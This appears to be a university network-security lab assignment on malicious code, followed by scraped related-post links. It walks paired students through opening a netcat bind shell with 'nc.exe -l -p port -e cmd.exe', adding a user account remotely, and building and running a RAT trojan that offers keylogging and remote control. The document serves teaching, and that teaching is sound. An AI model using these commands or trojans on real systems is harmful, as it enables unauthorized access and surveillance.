实验四恶意代码分析技术 201421430029
学 号:201421430029
中国人民公安大学
Chinese people’ public security university
网络对抗技术
实验报告
实验四 |
恶意代码技术 |
学生姓名 |
巩耀阳 |
年级 |
2014 |
区队 |
3 |
指导教师 |
高见老师 |
信息技术与网络安全学院
2016年11月7日
实验任务总纲
2016—2017 学年 第 一 学期
一、实验目的
1.通过对木马的练习,使读者理解和掌握木马传播和运行的机制;通过手动删除木马,掌握检查木马和删除木马的技巧,学会防御木马的相关知识,加深对木马的安全防范意识。
2.了解并熟悉常用的网络攻击工具,木马的基本功能;
3.达到巩固课程知识和实际应用的目的。
二、实验要求
1.认真阅读每个实验内容,需要截图的题目,需清晰截图并对截图进行标注和说明。
2.文档要求结构清晰,图文表达准确,标注规范。推理内容客观、合理、逻辑性强。
3.软件工具可使用NC、MSF等。
4.实验结束后,保留电子文档。
三、实验步骤
1.准备
提前做好实验准备,实验前应把详细了解实验目的、实验要求和实验内容,熟悉并准备好实验用的软件工具,按照实验内容和要求提前做好实验内容的准备。
2.实验环境
描述实验所使用的硬件和软件环境(包括各种软件工具);
开机并启动软件office2003或2007、浏览器、加解密软件。
3.实验过程
1)启动系统和启动工具软件环境。
2)用软件工具实现实验内容。
4.实验报告
按照统一要求的实验报告格式书写实验报告。把按照模板格式编写的文档嵌入到实验报告文档中,文档按照规定的书写格式书写,表格要有表说图形要有图说。
任务一 利用NC控制电脑
NetCat,具有网络军刀之称,它小巧精悍且功能强大,说它小巧精悍,是因为他的软件大小现在已经压缩到只有十几KB,而且在功能上丝毫不减。
实验过程需要两个同学相互配合完成:
步骤一:
在受害者的机器 (同学A)
输入下面的命令:
nc.exe -l -p port -e cmd.exe 进入监听模式
步骤二:
在攻击者的机器.(同学B)
输入下面的命令:
nc ip port //连接victim_IP,然后得到一个shell。 (需要截图)
步骤三:
在shell中,利用net user 用户名 密码 /add ,添加一个用户,并在受害者的机器中使用 net user 命令进行验证。(需要截图)
可以继续通过命令行做一些事情。
任务二 利用木马控制电脑
实验过程需要两个同学配合:
步骤一:
攻击者的机器. (同学A)
打开V2014.exe程序或则star RAT,这两个木马功能类似。
步骤二:
点击菜单栏中的“服务生成”,在弹出的配置服务端中,配置回连IP地址(攻击者IP)和端口号,并点击“生成”按钮,生成木马服务端。
步骤三:
将生成的木马可执行程序拷贝到受害者的机器,并双击运行。
步骤四:
在控制端中查看木马上线情况,并对以下功能每个进行测试和截图。
1、控制主机
2、获取桌面
3、拷贝文件
4、键盘记录
6、重启电脑
转载于:https://www.cnblogs.com/P201421430029/p/7751308.html
实验四恶意代码分析技术 201421430029相关推荐
- 20155222卢梓杰 实验四 恶意代码分析
实验四 恶意代码分析 1.系统运行监控 实验步骤如下 1.使用批处理监控程序连接网络的状况 在C盘要目录下建一个文件c:\netstatlog.bat,内容如下: date /t >> c ...
- 20155235 《网络攻防》 实验四 恶意代码分析
20155235 <网络攻防> 实验四 恶意代码分析 实验目的 是监控你自己系统的运行状态,看有没有可疑的程序在运行. 是分析一个恶意软件,就分析Exp2或Exp3中生成后门软件:分析工具 ...
- 20145231熊梓宏 《网络对抗》 实验四 恶意代码分析
20145231熊梓宏 <网络对抗> 实验四 恶意代码分析 基础问题回答 1.如果在工作中怀疑一台主机上有恶意代码,但只是猜想,所有想监控下系统一天天的到底在干些什么.请设计下你想监控的操 ...
- 实验四 恶意代码技术
学 号201421460014 中国人民公安大学 Chinese people' public security university 网络对抗技术 实验报告 实验四 恶意代码技术 学 ...
- 实验四 恶意代码技术
实验报告 四 学 号 中国人民公安大学 Chinese people' public security university 网络对抗技术 实验报告 实验四 恶意代码技术 学生姓名 ...
- 实验四——恶意代码技术
学 号 201421430035 中国人民公安大学 Chinese people' public security university 网络对抗技术 实验报告 实验四 恶意代码技术 ...
- 实验四 恶意代码
中国人民公安大学 Chinese people' public security university 网络对抗技术 实验报告 实验四 恶意代码技术 学生姓名 冷其航 年级 14级 区队 ...
- 【实验报告】四恶意代码实验
学 号201421420040 中国人民公安大学 Chinese people' public security university 网络对抗技术 实验报告 实验四 恶意代码技术 ...
- 信安教程第二版-第14章恶意代码防范技术原理
第14章恶意代码防范技术原理 14.1 恶意代码概述 261 14.1.1 恶意代码定义与分类 261 14.1.2 恶意代码攻击模型 262 14.1.3 恶意代码生存技术 263 14.1.4 恶 ...
最新文章
- 一文看懂计算机视觉-CV(基本原理+2大挑战+8大任务+4个应用)
- AI如何在安防行业更加深入?可从超高清视频监控切入
- Python IDE专用编辑器PyCharm下载及配置安装过程(Ubuntu环境)
- TPCAST无线传输模块年底将推出 Oculus Rift 版本
- retinaface验证
- .Net Micro Framework研究—TCP/IP通信
- Tensorflow学习教程集合
- Microsoft My Phone试用手记
- Nginx深入详解之模块化体系结构
- csv 文件驱动的 jMeter 并发测试
- 【Clickhouse】Clickhouse 整合 Prometheus 监控 运行时状态
- 智能锁行业安全分析报告
- 北师大版图形的旋转二教案_北师大版三年级数学下册微课精讲+课件教案试卷(文末下载)...
- 微型计算机系统教案,微型计算机硬件系统教案
- CGI与ISAPI的区别
- 推荐9个强大的谷歌插件,程序猿必备!不看后悔系列!
- 因为计算机中丢失MSVCp,无法启动此程序,因为计算机中丢失MSVCP140.dll的
- 葫芦娃用计算机,葫芦娃互通版电脑版
- JDK8升至JDK11 新特性整理
- php极简wiki,Wiki.js初体验